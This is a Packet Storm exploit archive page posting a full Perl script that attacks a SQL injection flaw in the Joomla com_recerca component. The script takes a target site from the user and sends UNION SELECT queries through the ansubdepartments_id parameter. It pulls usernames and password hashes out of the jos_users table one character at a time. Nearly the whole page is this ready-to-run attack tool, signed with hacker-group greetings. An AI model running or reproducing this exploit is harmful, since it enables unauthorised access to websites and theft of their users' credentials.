exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Recerca SQL Injection

Joomla Recerca SQL Injection
Posted Oct 8, 2009
Authored by Don Tukulesto | Site indonesiancoder.com

The Joomla Recerca component suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 918fd128c5b2063a82b782b1023a1fc630b16609a39c38665e043e91dd4b2b13

Joomla Recerca SQL Injection

Change Mirror Download
#!/usr/bin/perl

#=========================== [ root@indonesiancoder.com $ ~] ===========================#
# [~] Joomla Components com_recerca (ansubdepartments_id) SQL Injection Vulneralbility #
# [~] Author : Don Tukulesto #
# [~] Homepage : http://www.indonesiancoder.com #
# [~] Tune in : http://www.AntiSecradio.fm ( choose your weapon ) #
# [~] Gracias : IndonesianCoder.com - AntiSecurity.org - ServerIsDown.org - MainHack #
# [~] kaMtiEz, M3NW5, arianom, Jack-, Yadoy666, Gonzhack, SoulNet, s4va, tiw0L, Kill-9 #
# [~] SAINT, CYB3R_TR0N, M364TR0N, NoGe, TUCKER, Ian Petrucii, RoNz, Chercut, YOU !! #
#=========================== [ root@indonesiancoder.com $ ~] ===========================#


use HTTP::Request;
use LWP::UserAgent;

$cmsapp = 'Joomla Component com_recerca';
$vuln = 'index.php?option=com_recerca&task=linia&ansubdepartments_id=';
$column = 'concat(username,0x3a,password)tukulesto';
$table = 'jos_users';
$regexp = 'No elements defined';
$maxlen = 65;

my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }

printf "\n
$cmsapp
[x]====================================================[x]
| www[dot]IndonesianCoder[dot]com |
[x]====================================================[x]

\n";

print " [~] URL Path : "; chomp($web=<STDIN>);
print " [~] Valid ID : "; chomp($id=<STDIN>);
print " [~] Column : "; chomp($columns=<STDIN>);

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";

sub get_data() {
@columns = split(/,/, $columns);
foreach $column (@columns) {
print " [exploiting\@$web] SELECT $column FROM $table please wait...\n";
syswrite(STDOUT, " [exploiting\@$web] $column\@$table > ", 255);
for (my $i=1; $i<=$maxlen; $i++) {
my $chr = 0;
my $found = 1;
my $char = 48;
while (!$chr && $char<=90) {
if(exploit($i,$char) !~ /$regexp/) {
$chr = 1;
$found = 1;
syswrite(STDOUT,chr($char),1);
} else { $found = 0; }
$char++;
}
if(!$chr) {
$char = 97;
while(!$chr && $char<=122) {
if(exploit($i,$char) !~ /$regexp/) {
$chr = 1;
$found = 1;
syswrite(STDOUT,chr($char),1);
} else { $found = 0; }
$char++;
}
}
if (!$found) {
print "\n"; last;
}
}
}
}

sub exploit() {
my $limit = $_[0];
my $chars = $_[1];
my $shits = '+union+select+1,2,3,'.$column.',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+'.$table.'--';
my $inject = $target.$vuln.$id.$shits;
my $content = get_content($inject);
return $content;
}

sub get_content() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(15);
my $res = $ua->request($req);
if ($res->is_error){
print "\n\n [!] Error, ".$res->status_line.".\n\n";
exit;
}
return $res->content;
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close